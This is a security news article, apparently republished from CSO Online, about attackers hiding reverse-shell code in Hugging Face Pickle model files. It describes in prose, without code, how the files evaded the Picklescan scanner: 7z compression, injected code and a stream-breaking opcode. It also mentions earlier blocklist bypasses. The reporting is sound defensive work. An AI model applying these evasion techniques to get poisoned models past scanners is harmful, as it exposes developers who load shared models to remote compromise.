Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

URL has been copied successfully!
Attackers hide malicious code in Hugging Face AI model Pickle files
URL has been copied successfully!

Collecting Cyber-News from over 60 sources

Attackers hide malicious code in Hugging Face AI model Pickle files

Like all repositories of open-source software in recent years, AI model hosting platform Hugging Face has been abused by attackers to upload trojanized projects and assets with the goal of infecting unsuspecting users. The latest technique observed by researchers involves intentionally broken but poisoned Python object serialization files called Pickle files.Often described as the GitHub for machine learning, Hugging Face is the largest online hosting database for open-source AI models and other machine learning assets. In addition to hosting services, the platform provides collaboration features for developers to share their own apps, model transformations, and model fine-tunings.”During RL research efforts, the team came upon two Hugging Face models containing malicious code that were not flagged as ‘unsafe’ by Hugging Face’s security scanning mechanisms,” researchers from security firm ReversingLabs wrote in a new report. “RL has named this technique ‘nullifAI,’ because it involves evading existing protections in the AI community for an ML model.” While Hugging Face supports machine learning (ML) models in various formats, Pickle is among the most prevalent thanks to the popularity of PyTorch, a widely used ML library written in Python that uses Pickle serialization and deserialization for models. Pickle is an official Python module for object serialization, which in programming languages means turning an object into a byte stream, the reverse process is known as deserialization, or in Python terminology: pickling and unpickling.The process of serialization and deserialization, especially of input from untrusted sources, has been the cause of many remote code execution vulnerabilities in a variety of programming languages. Similarly, the Python documentation for Pickle has a big red warning: “It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never unpickle data that could have come from an untrusted source, or that could have been tampered with.”That poses a problem for an open platform like Hugging Face, where users openly share and have to unpickle model data. On one hand, this opens the potential for abuse by ill-intentioned individuals who upload poisoned models, but on the other, banning this format would be too restrictive given PyTorch’s popularity. So Hugging Face chose the middle road, which is to attempt to scan and detect malicious Pickle files.This is done with an open-source tool dubbed Picklescan that essentially implements a blacklist for dangerous methods or objects that could be included in Pickle files, such as  eval, exec, compile, open, etc.However, researchers from security firm Checkmarx recently showed that this blacklist approach is insufficient and can’t catch all possible abuse methods. First, they showed a bypass based on Bdb.run instead of exec, with Bdb being a debugger built into Python. Then, when that was reported and blocked, they found another bypass using an asyncio gadget that still used built-in Python functionality.

Bad pickles

The two malicious models found by ReversingLabs used a much simpler approach: They messed with the format expected by the tool. The PyTorch format is essentially a Pickle file compressed with ZIP, but the attackers compressed it with 7-zip (7z) so the default torch.load() function would fail. This also caused Picklescan to fail to detect them.After unpacking them, the malicious Pickle files had malicious Python code injected into them at the start, essentially breaking the byte stream. The rogue code, when executed, opened a platform-aware reverse shell that connected back to a hardcoded IP address.But that got the ReversingLabs researchers wondering: How would Picklescan behave if it encountered a Pickle file in a broken format? So they created a malicious but valid file, that was correctly flagged by Picklescan as suspicious and triggered a warning, then a file with malicious code injected at the start but an “X” binunicode Pickle opcode towards the end of the byte stream that essentially broke the stream before the normal 0x2E (STOP) opcode was encountered.Picklescan produced a parsing error when it encountered the X opcode, but did not provide a warning about the suspicious functions encountered earlier in the file, which had already been executed by the time the X opcode triggered the parsing error.”The failure to detect the presence of a malicious function poses a serious problem for AI development organizations,” the researchers wrote. “Pickle file deserialization works in a different way from Pickle security scanning tools. Picklescan, for example, first validates Pickle files and, if they are validated, performs security scanning. Pickle deserialization, however, works like an interpreter, interpreting opcodes as they are read, but without first conducting a comprehensive scan to determine if the file is valid, or whether it is corrupted at some later point in the stream.”

Avoid pickles from strangers

The developers of Picklescan were notified and the tool was changed to be able to identify threats in broken Pickle files, before waiting for the file to be validated first. However, organizations should remain wary of models from untrusted sources delivered as Pickle files, even if they were first scanned with tools such as Picklescan. Other bypasses are likely to be found in the future because blacklists are never perfect.”Our conclusion: Pickle files present a security risk when used on a collaborative platform where consuming data from untrusted sources is the basic part of the workflow,” the researchers wrote.

First seen on csoonline.com

Jump to article: www.csoonline.com/article/3819920/attackers-hide-malicious-code-in-hugging-face-ai-model-pickle-files.html

Loading

Share via Email
Share on Facebook
Tweet on X (Twitter)
Share on Whatsapp
Share on LinkedIn
Share on Xing
Copy link